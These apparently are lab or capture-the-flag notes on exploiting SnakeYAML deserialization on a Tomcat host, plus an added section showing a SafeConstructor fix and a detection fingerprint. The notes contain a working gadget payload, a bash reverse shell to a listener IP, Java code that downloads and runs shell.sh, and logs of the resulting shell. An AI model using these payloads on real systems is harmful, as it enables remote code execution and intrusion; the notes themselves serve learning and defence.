3 yaml deserialization exploit

Just searching on Google for "YAML exploit":

https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
https://github.com/mbechler/marshalsec

Testing

yaml:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.15/"]
  ]]
]

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.227 - - [04/May/2021 22:07:49] code 404, message File not found
10.10.10.227 - - [04/May/2021 22:07:49] "HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 404 -

https://github.com/artsploit/yaml-payload

# shell.sh
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.14.15/6969 0>&1'

# changes to code
public AwesomeScriptEngineFactory() throws Exception {
	try {
		Runtime.getRuntime().exec("curl http://10.10.14.15/shell.sh -o /tmp/shell.sh");
		Runtime.getRuntime().exec("chmod +x /tmp/shell.sh");
		Runtime.getRuntime().exec("./tmp/shell.sh");
	} catch (IOException e) {
		e.printStackTrace();
	}
}

10.10.10.227 - - [04/May/2021 22:54:04] "HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /artsploit/AwesomeScriptEngineFactory.class HTTP/1.1" 200 -
10.10.10.227 - - [04/May/2021 22:54:04] "GET /shell.sh HTTP/1.1" 200 -

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.227] 34808
bash: cannot set terminal process group (829): Inappropriate ioctl for device
bash: no job control in this shell
whoami;id
whoami;id
tomcat
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
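The mechanism behind the log lines above: SnakeYAML's default `Constructor` treats a global tag such as `!!javax.script.ScriptEngineManager` as a Java class to instantiate, and a `ScriptEngineManager` handed a `URLClassLoader` immediately does a service lookup for `META-INF/services/javax.script.ScriptEngineFactory` on that loader, which is why the very first request the listener sees is for that path (404 until the artsploit jar layout is served). The fix on the parsing side is to construct the `Yaml` instance with `SafeConstructor`, which only builds standard YAML types and rejects every class-naming tag before any class loading happens. The following is an added example written for these notes, not code from the page, from artsploit or from the SnakeYAML project; it assumes SnakeYAML 2.x on the classpath (the `SafeConstructor(LoaderOptions)` form also exists in late 1.x releases) and reuses the page's payload purely as a string, so nothing is fetched from the URL.

```java
// Added example: loading the page's payload with SnakeYAML's SafeConstructor.
// Assumes org.yaml:snakeyaml 2.x on the classpath (assumption, not from the page).
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class SafeYamlLoad {

    // The same document that appears in the notes above. The host is the
    // listener from the page and is only ever handled as a string here.
    static final String PAYLOAD =
        "!!javax.script.ScriptEngineManager [\n" +
        "  !!java.net.URLClassLoader [[\n" +
        "    !!java.net.URL [\"http://10.10.14.15/\"]\n" +
        "  ]]\n" +
        "]\n";

    // Only maps, lists and scalars are constructed. A global tag that names a
    // Java class has no registered constructor, so SnakeYAML throws before a
    // URLClassLoader or ScriptEngineManager can ever be created.
    static Object loadSafely(String doc) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(doc);
    }

    public static void main(String[] args) {
        try {
            Object result = loadSafely(PAYLOAD);
            System.out.println("Loaded: " + result);
        } catch (YAMLException e) {
            // Expected for the payload: the message names the unsupported tag
            // tag:yaml.org,2002:javax.script.ScriptEngineManager and no request
            // is made to the URL inside the document.
            System.out.println("Rejected: " + e.getMessage());
        }

        // Ordinary configuration data still loads as a plain Map.
        System.out.println("Loaded: " + loadSafely("name: app\nports: [80, 443]\n"));
    }
}
```

The vulnerable pattern is `new Yaml()` (or `new Yaml(new Constructor(...))`) on SnakeYAML 1.x, where the default constructor resolves global tags to classes; from SnakeYAML 2.0 the default no longer instantiates arbitrary classes, but code that still targets 1.x should switch to `SafeConstructor` rather than rely on an upgrade. On the detection side, the request sequence visible in the page's listener log (a `HEAD`/`GET` for `/META-INF/services/javax.script.ScriptEngineFactory` followed by a `.class` fetch) is the fingerprint of this gadget: an application server that makes outbound HTTP requests for `META-INF/services/` paths is performing a remote SPI lookup and should be treated as a deserialization incident.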
